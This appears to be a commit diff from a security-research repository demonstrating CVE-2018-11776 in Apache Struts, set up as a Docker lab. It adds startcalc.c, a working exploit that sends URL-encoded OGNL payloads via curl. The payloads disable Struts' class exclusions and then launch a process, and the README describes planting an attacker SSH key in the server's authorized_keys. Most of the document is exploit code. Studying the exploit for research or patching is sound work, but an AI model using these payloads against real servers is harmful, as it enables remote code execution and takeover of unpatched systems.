Add instructions for popping a calculator.

Author: kevinbackhouse

Apache/Struts/CVE-2018-11776/README.md

@@ -58,7 +58,7 @@ docker run --rm --network struts-demo-network --ip=172.16.0.11 -h struts-attacke
 Inside the container, build `copykey.c` and use it to copy the attacker's ssh key into the server's `authorized_keys` file. Then use `ssh` to login.
 
 ```
-gcc copykey.c -o copykey
+gcc copykey.c utils.c -o copykey
 ./copykey http://172.16.0.10:8080/struts2-showcase
 ssh victim@172.16.0.10
 ```

Apache/Struts/CVE-2018-11776/struts-attacker/copykey.c

@@ -3,66 +3,7 @@
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
-
-// Replace / with '+#sl+'. This is needed to sneak / characters past Tomcat.
-// It is based on the assumption that the string will be enclosed in
-// single quotes.
-int escape_forward_slash(char* dst, size_t dstlen, const char* src) {
-  for (;; src++) {
-    const char c = *src;
-    if (c == '\0') {
-      if (dstlen < 1) {
-        return -1;
-      }
-      *dst = '\0';
-      return 0;
-    } else if (c == '/') {
-      if (dstlen < 7) {
-        return -1;
-      }
-      memcpy(dst, "'+#sl+'", 7);
-      dst += 7;
-      dstlen -= 7;
-    } else {
-      if (dstlen < 1) {
-        return -1;
-      }
-      *dst = c;
-      dst++;
-      dstlen--;
-    }
-  }
-}
-
-int urlencode(char* dst, size_t dstlen, const char* src) {
-  for (;; src++) {
-    const char c = *src;
-    if (c == '\0') {
-      if (dstlen < 1) {
-        return -1;
-      }
-      *dst = '\0';
-      return 0;
-    } else if (('a' <= c && c <= 'z') ||
-	       ('A' <= c && c <= 'Z') ||
-	       ('0' <= c && c <= '9') ||
-	       c == '-' || c == '_' || c == '.' || c == '~') {
-      if (dstlen < 1) {
-        return -1;
-      }
-      *dst = c;
-      dst++;
-      dstlen--;
-    } else {
-      if (dstlen < 3) {
-        return -1;
-      }
-      sprintf(dst, "%%%.2x", c);
-      dst += 3;
-      dstlen -= 3;
-    }
-  }
-}
+#include "utils.h"
 
 int main(int argc, char* argv[]) {
   if (argc < 2) {
@@ -122,7 +63,7 @@ int main(int argc, char* argv[]) {
   // Escape the slash characters in url2B.
   escape_forward_slash(scratch3, sizeof(scratch3), url2B);
 
-  // urlencode the first payload and send it to the Struts server.
+  // urlencode the second payload and send it to the Struts server.
   snprintf(scratch1, sizeof(scratch1), "%s%s%s", url2A, scratch2, scratch3);
   urlencode(scratch2, sizeof(scratch2), scratch1);
   snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch2);

Apache/Struts/CVE-2018-11776/struts-attacker/startcalc.c

@@ -0,0 +1,71 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include "utils.h"
+
+// NOTE:
+// This exploit will not work if Struts is running in a docker container,
+// because you cannot pop a calculator from inside docker. So this exploit
+// requires you to run Struts outside of docker. The easiest way to do this
+// is to follow the instructions in the README for building Struts in
+// docker. Then just copy the tomcat directory out of docker. To do that,
+// start docker like this:
+//
+// ```
+// docker run -v `pwd`:/home/victim/temp -i -t struts-server
+// ```
+//
+// And inside docker, copy the tomcat directory into `temp` which is mapped
+// to the directory that you started docker from:
+//
+// ```
+// cp -r apache-tomcat-9.0.12/ temp/
+// ```
+
+int main(int argc, char* argv[]) {
+  if (argc < 2) {
+    printf("usage example: http://172.16.0.10:8080/struts2-showcase\n");
+    return 1;
+  }
+
+  const char* url = argv[1];
+
+  // Scratch buffers for building the curl command line.
+  char scratch1[2048];
+  char scratch2[2048];
+  char cmd[4096];
+
+  // First OGNL payload, which we need to urlencode and send to the Struts
+  // server with curl.
+  const char* url1 =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl."
+    "OgnlUtil@class)).(#ognlUtil.setExcludedClasses(''))."
+    "(#ognlUtil.setExcludedPackageNames(''))}";
+
+  // urlencode the first payload and send it to the Struts server.
+  urlencode(scratch1, sizeof(scratch1), url1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch1);
+  system(cmd);
+
+  // Second OGNL payload. We need to paste our ssh key into the middle of
+  // this string and urlencode it.
+  const char* url2 =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context."
+    "setMemberAccess(#dm)).(#sl=@java.io.File@separator)."
+    "(#p=new java.lang.ProcessBuilder({'bash','-c','gnome-calculator'})).(#p.start())}";
+
+  // Escape any slash characters in the ssh key, to stop Tomcat from
+  // intercepting them.
+  escape_forward_slash(scratch1, sizeof(scratch1), url2);
+
+  urlencode(scratch2, sizeof(scratch2), scratch1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch2);
+  system(cmd);
+
+  return 0;
+}

Apache/Struts/CVE-2018-11776/struts-attacker/utils.c

@@ -0,0 +1,63 @@
+#include <string.h>
+#include <stdio.h>
+#include "utils.h"
+
+// Replace / with '+#sl+'. This is needed to sneak / characters past Tomcat.
+// It is based on the assumption that the string will be enclosed in
+// single quotes.
+int escape_forward_slash(char* dst, size_t dstlen, const char* src) {
+  for (;; src++) {
+    const char c = *src;
+    if (c == '\0') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = '\0';
+      return 0;
+    } else if (c == '/') {
+      if (dstlen < 7) {
+        return -1;
+      }
+      memcpy(dst, "'+#sl+'", 7);
+      dst += 7;
+      dstlen -= 7;
+    } else {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = c;
+      dst++;
+      dstlen--;
+    }
+  }
+}
+
+int urlencode(char* dst, size_t dstlen, const char* src) {
+  for (;; src++) {
+    const char c = *src;
+    if (c == '\0') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = '\0';
+      return 0;
+    } else if (('a' <= c && c <= 'z') ||
+	       ('A' <= c && c <= 'Z') ||
+	       ('0' <= c && c <= '9') ||
+	       c == '-' || c == '_' || c == '.' || c == '~') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = c;
+      dst++;
+      dstlen--;
+    } else {
+      if (dstlen < 3) {
+        return -1;
+      }
+      sprintf(dst, "%%%.2x", c);
+      dst += 3;
+      dstlen -= 3;
+    }
+  }
+}

Apache/Struts/CVE-2018-11776/struts-attacker/utils.h

@@ -0,0 +1,2 @@
+int escape_forward_slash(char* dst, size_t dstlen, const char* src);
+int urlencode(char* dst, size_t dstlen, const char* src);